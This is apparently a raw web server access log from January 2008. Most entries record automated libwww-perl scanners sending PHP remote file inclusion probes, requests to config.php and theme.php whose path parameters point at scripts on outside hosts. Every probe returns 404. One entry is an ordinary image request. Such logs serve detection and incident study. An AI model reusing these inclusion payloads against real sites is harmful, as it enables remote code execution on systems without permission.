207.58.187.94 - - [06/Jan/2008:08:53:54 -0800] "GET /logs/access_071224.log/config.php?path_to_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.187.94 - - [06/Jan/2008:08:53:54 -0800] "GET /config.php?path_to_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.187.94 - - [06/Jan/2008:08:53:55 -0800] "GET /logs/config.php?path_to_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:53:59 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000004.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
83.86.203.126 - - [06/Jan/2008:08:56:56 -0800] "GET /logs/access_071122.log/*coppercop/theme.php?THEME_DIR=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.86.203.126 - - [06/Jan/2008:08:56:57 -0800] "GET /*coppercop/theme.php?THEME_DIR=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.86.203.126 - - [06/Jan/2008:08:56:57 -0800] "GET /logs/*coppercop/theme.php?THEME_DIR=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.86.203.126 - - [06/Jan/2008:08:57:22 -0800] "GET /logs/access_071210.log/*coppercop/theme.php?THEME_DIR=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
